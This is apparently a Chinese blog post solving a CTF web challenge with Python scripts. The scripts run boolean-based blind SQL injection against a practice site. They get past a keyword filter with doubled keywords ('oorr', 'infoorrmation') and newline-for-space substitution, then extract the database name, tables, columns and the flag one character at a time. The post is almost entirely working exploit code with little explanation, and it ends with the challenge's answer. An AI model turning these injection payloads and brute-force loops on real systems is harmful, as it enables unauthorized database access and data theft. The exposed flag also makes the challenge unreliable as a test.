我的第一只小爬虫
爆数据库长度
import requests
import re
import string
import threading
import time
s = requests.session()
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str1 = "You are in"
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0"}
for i in range(1,25):
key1 = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
res = s.post(url,data=key1,headers=header).content.decode('utf-8')
print(i)
time.sleep(1)
if str1 in res:
print("database length:%s"%i)
break爆库名
import requests
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str = "You are in"
db=''
l="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~+=-*/\{}?!:@#$&[]._"
for i in range(1,19):
for j in l:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
res = requests.post(url,data=key).text
if str in res:
db += j
break
print(db)
爆表长度
import requests
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str = "You are in"
l = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = int(1)
len = 0
while True:
k = "0'oorr((select(mid(group_concat(table_name separatoorr '~')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0)"%i
k = k.replace(' ',chr(0x0a))
key = {'id':k}
res = requests.post(url,data=key).text
print(i)
if str in res:
print("table length is:%s"%i)
break
i += 1爆表名
import requests
from bs4 import BeautifulSoup
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str = "You are in"
l = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
for i in range(1,12):
for j in l:
k = "0'oorr((select(mid(group_concat(table_name separatoorr '~')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
k=k.replace(' ',chr(0x0a))
key = {'id':k}
res = requests.post(url,data=key).text
print(i,j)
if str in res:
table += j
break
print(table)爆列宽
import requests
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str = "You are in"
l = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = int(1)
while True:
k = "0'oorr((select(mid(group_concat(column_name separatoorr '~')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
k = k.replace(' ',chr(0x0a))
key = {'id':k}
res = requests.post(url,data=key).text
print(i)
if str in res:
print("column length is:%s"%i)
break
i += 1爆列名
import requests
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str = "You are in"
l = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ''
for i in range(1,7):
for j in l:
k = "0'oorr((select(mid(group_concat(column_name separatoorr '~')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
k = k.replace(' ',chr(0x0a))
key = {'id':k}
res = requests.post(url,data=key).text
print(i,j)
if str in res:
column += j
break
print(column)得到flag
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]. "
i = 1
ss = ''
print("start")
for i in range(1,20):
for j in guess:
res = "0'oorr((mid((select(group_concat(fl$4g))from(fiag))from(%s)foorr(1)))='%s')oorr'0" % (i, j)
# res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
print(i, j)
if str in r:
ss += j
break
print("flag is:%s"%ss)
print("end!")flag为:flag{haha~you win!}
609
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
